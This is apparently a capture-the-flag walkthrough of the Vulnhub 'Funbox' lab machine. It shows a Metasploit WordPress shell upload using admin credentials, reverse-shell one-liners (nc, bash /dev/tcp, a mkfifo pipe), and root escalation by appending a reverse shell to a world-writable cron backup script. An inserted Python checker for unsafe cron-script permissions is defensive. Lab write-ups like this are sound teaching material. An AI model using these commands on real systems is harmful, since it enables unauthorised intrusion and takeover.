msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.146
LHOST => 192.168.56.146
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.164
RHOSTS => 192.168.56.164
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD iubire
PASSWORD => iubire
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[-] Handler failed to bind to 192.168.56.146:5555:- -
[-] Handler failed to bind to 0.0.0.0:5555:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:5555).
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) >
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS funbox.fritz.box
RHOSTS => funbox.fritz.box
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:iubire...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/RDbPTmaIBL/GUpqQZSzdR.php...
[*] Sending stage (39927 bytes) to 192.168.56.164
[+] Deleted GUpqQZSzdR.php
[+] Deleted RDbPTmaIBL.php
[+] Deleted ../RDbPTmaIBL
[*] Meterpreter session 1 opened (192.168.56.146:5555 -> 192.168.56.164:54050) at 2023-01-10 21:47:30 -0500
meterpreter > shell
Process 2443 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which nc
sh: 0: getcwd() failed: No such file or directory
/usr/bin/nc
nc -e /bin/bash 192.168.56.146 6666
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
/bin/sh: 6: Syntax error: Bad fd number
meterpreter > bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'
[-] Unknown command: bash
meterpreter > shell
Process 2458 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 6666 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
Spawn a new shell on top of the meterpreter shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 56812
sh: 0: getcwd() failed: No such file or directory
/bin/sh: 0: can't access tty; job control turned off
$ which python
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
Privilege escalation
www-data@funbox:/home/funny$ cat .reminder.sh
cat .reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox
.reminder.sh hints that backup.sh is run as a scheduled task, and that file is writable by everyone.
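A defender's check for the weakness this step relies on (a root cron job running a script that other users can write), as an added example that is not part of the original write-up: it lists the scripts a crontab runs and reports any that are writable by others, owned by someone else, or sitting in a directory others can write to. The crontab text and the 0777 mode are constructed, since the write-up infers the job from .reminder.sh but never shows the entry; `harden` and `demo` are names of this example only.

```python
import os
import stat
import tempfile

# Constructed stand-ins so the check runs offline. On the target the script was
# /home/funny/.backup.sh; the crontab entry below is assumed, not taken from the box.
BACKUP_SH = "#!/bin/bash\ntar -cf /home/funny/html.tar /var/www/html\n"
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/funny/.backup.sh
"""


def cron_script_paths(crontab_text):
    """Return (user, first command token) for each /etc/crontab-style entry,
    skipping blanks, comments and VAR=value assignments."""
    jobs = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)  # 5 schedule fields, user, command
        if len(parts) == 7:
            jobs.append((parts[5], parts[6].split()[0]))
    return jobs


def script_findings(path, runs_as_uid=0):
    """Reasons a script executed by runs_as_uid (0 for the root job above) is
    unsafe: others can edit it, someone else owns it, or others can replace
    the whole file because the directory is writable without the sticky bit."""
    st = os.stat(path)
    findings = []
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_uid != runs_as_uid:
        findings.append(f"owned by uid {st.st_uid}, not uid {runs_as_uid}")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit")
    return findings


def harden(path):
    """Minimal fix: owner rwx, group rx, nothing for others. Ownership should
    also match the user that runs the job; chown needs root, so it is left
    to the operator here."""
    os.chmod(path, 0o750)


def demo():
    """Build a throwaway copy of the weak layout, audit it, harden it, audit
    again. runs_as_uid is the current user so the demo works without root;
    on a real box pass 0 for jobs the crontab runs as root."""
    home = tempfile.mkdtemp(prefix="funny-")
    script = os.path.join(home, ".backup.sh")
    with open(script, "w") as fh:
        fh.write(BACKUP_SH)
    os.chmod(script, 0o777)  # constructed: world-writable, as the write-up reports
    me = os.getuid()
    before = script_findings(script, runs_as_uid=me)
    harden(script)
    after = script_findings(script, runs_as_uid=me)
    return before, after


if __name__ == "__main__":
    for user, cmd in cron_script_paths(CRONTAB):
        print(f"{user} runs {cmd}")
    print(demo())
```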
www-data@funbox:/home/funny$ cat .backup.sh
cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
www-data@funbox:/home/funny$ which nano
which nano
/usr/bin/nano
www-data@funbox:/home/funny$ nano .backup.sh
nano .backup.sh
Error opening terminal: unknown.
www-data@funbox:/home/funny$ echo 'bash -i >& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
www-data@funbox:/home/funny$ cat .backup.sh
cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
bash -i >& /dev/tcp/192.168.56.146/9999 0>&1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nc -nlvp 9999
[sudo] password for kali:
listening on [any] 9999 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 35070
bash: cannot set terminal process group (2518): Inappropriate ioctl for device
bash: no job control in this shell
root@funbox:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@funbox:~# cd /root
cd /root
root@funbox:~# ls
ls
flag.txt
mbox
snap
root@funbox:~# cat flag.txt
cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
root@funbox:~#
With that, root privilege escalation is achieved and the root flag obtained.
STRIVE FOR PROGRESS, NOT FOR PERFECTION
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/551908.html
